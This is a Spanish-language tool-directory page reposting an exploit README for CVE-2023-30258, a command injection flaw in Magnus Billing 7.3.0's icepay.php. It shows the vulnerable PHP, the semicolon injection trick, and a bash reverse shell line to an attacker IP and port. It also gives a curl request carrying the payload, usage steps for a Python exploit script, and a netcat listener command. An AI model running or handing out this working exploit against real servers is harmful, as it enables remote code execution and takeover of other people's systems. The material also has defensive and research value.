Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/kayl22/magnus_billing_7.3.0_rce_cve-2023-30258
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubkayl22/magnus_billing_7.3.0_rce_cve-2023-30258

magnus_billing_7.3.0_RCE_CVE-2023-30258

Vulnerabilidad de RCE en magnus billing php resource

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 8 mesesAún no revisado

magnus_billing_7.3.0_RCE_CVE-2023-30258

Existe una vulnerabilidad de ejecución remota de código en magnus billing 7.3.0, en el parámetro "democ" del recurso "icepay.php", donde se puede escapar la consulta y ejecutar el comando deseado.

CÓDIGO VULNERABLE

root@kitploit:~
if (isset($_GET['democ'])) {
    if (strlen($_GET['democ']) > 5) {
        exec("touch " . $_GET['democ'] . '.txt');
    } else {
        exec("rm -rf *.txt");
    }
}

El parámetro "democ" se pasa a exec() para crear un nuevo archivo, pero como se puede ver no hay ninguna sanitización de cadenas, y el atacante puede escapar fácilmente el comando touch y ejecutar un comando o incluso obtener una reverse shell. Para omitir la extensión .txt, simplemente podemos agregar otro ";" al final de la cadena. El payload final se vería así:

root@kitploit:~
testfile;<comando>;testfile

y así es como se vería cuando se pasa a la función exec():

root@kitploit:~
exec('touch testfile;<comando>;testfile.txt');

ej. reverse shell:

root@kitploit:~
exec('touch testfile; bash -c "bash -i >& /dev/tcp/<ip>/<puerto> 0>&1";testfile.txt')

explotación >:D

podríamos usar curl para obtener una reverse shell, ej.

root@kitploit:~
curl -X GET http://127.0.0.1:8080/lib/icepay/icepay.php?democ=testfile;<payload_urlencoded>;testfile

o si lo prefieres, puedes usar el script de Python de este repositorio. Instalación:

root@kitploit:~
git clone https://github.com/kayl22/magnus_billing_7.3.0_RCE_CVE-2023-30258 # obtener el repositorio

cd ./magnus_billing_7.3.0_RCE_CVE-2023-30258                                # cambiar de directorio

chmod +x ./magnusbilling_rce.py                                             # agregar permisos de ejecución al script de Python

uso:

root@kitploit:~
./magnusbilling_rce.py -h                                                   # mostrar ayuda

./magnusbilling_rce.py -lh <ip_atacante> -lp <puerto_local> -u http://<ip/dominio>:<puerto>/

y por último, pero no menos importante, recuerda iniciar un listener con netcat:

root@kitploit:~
nc -nlvvp <puerto_local>
Descargar herramienta